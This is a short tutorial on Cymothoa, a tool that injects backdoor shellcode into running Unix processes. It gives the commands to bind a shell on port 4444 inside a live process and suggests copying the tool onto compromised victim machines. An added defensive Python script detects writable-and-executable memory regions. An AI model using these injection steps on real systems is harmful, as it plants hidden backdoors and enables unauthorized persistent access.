Cymothoa – Runtime shellcode injection Backdoors

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them. Keep in mind that it is a runtime injector, so it only works on applications that are already running.

Open your BackTrack terminal and type: cd /pentest/backdoors/cymothoa

Now type: ./cymothoa

The main syntax is: ./cymothoa -p <pid> -s <shellcode_number> [options]

Now type ./cymothoa -S for a list of all available shellcodes.

To infect a currently running process you first need its PID; type ps -aux to see a list of live processes.

I launch a dictionary application to attach to and run: ./cymothoa -p 1510 -s 0 -y 4444

-p   process ID (1510)
-s   shellcode number; 0 binds /bin/sh to the provided port (requires -y)
-y   port to bind to; 4444 will open up a shell on port 4444

You can potentially inject any type of backdoor into any program or application on the system. Because it is a runtime injector, it only works on systems you already have access to. Once a system is compromised, Cymothoa can be copied to the victim machine to generate stealthy backdoor shells.

Now scan the target with nmap: nmap -sV <victim IP>
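On the defender's side, the footprint this kind of injection leaves is memory in the target process that is both writable and executable, which a normal binary does not need. The following Python script is added here and is not part of Cymothoa or the original post; it lists such mappings from /proc/<pid>/maps, and the maps excerpt embedded in it is constructed, not captured from a real host.

```python
"""Host-side check for runtime shellcode injection: list /proc/<pid>/maps
regions that are both writable and executable. Normal binaries map code r-x
and data rw-; injected shellcode often sits in a w+x region. JIT runtimes
also create such regions, so treat hits as leads to inspect, not verdicts."""
import os
import re

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) \S+ \S+ (\d+)\s*(.*)$")

def wx_regions(maps_text):
    """Return (start, end, perms, path) for every writable+executable mapping."""
    hits = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        start, end, perms, inode, path = m.groups()
        if "w" in perms and "x" in perms:
            label = path or ("<anonymous>" if inode == "0" else "<unnamed>")
            hits.append((int(start, 16), int(end, 16), perms, label))
    return hits

def scan_processes(proc="/proc"):
    """Map pid -> w+x regions; reading other users' maps needs root."""
    results = {}
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc}/{pid}/maps") as f:
                hits = wx_regions(f.read())
        except OSError:  # process exited or maps not readable
            continue
        if hits:
            results[int(pid)] = hits
    return results

# Constructed sample (not from a real host): a normal r-x text segment, an
# anonymous rw- data region, one anonymous rwx region, and the stack.
SAMPLE_MAPS = """\
00400000-0040b000 r-xp 00000000 08:01 1312 /usr/bin/victim
7f2a3c000000-7f2a3c021000 rw-p 00000000 00:00 0
7f2a3c400000-7f2a3c401000 rwxp 00000000 00:00 0
7ffd1a2b0000-7ffd1a2d1000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    for pid, regions in sorted(scan_processes().items()):
        for start, end, perms, label in regions:
            print(f"pid {pid}: {start:#x}-{end:#x} {perms} {label}")
```

Run it as root to cover every process; an unexpected anonymous rwx region in a long-running daemon is worth correlating with that process's listening sockets.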

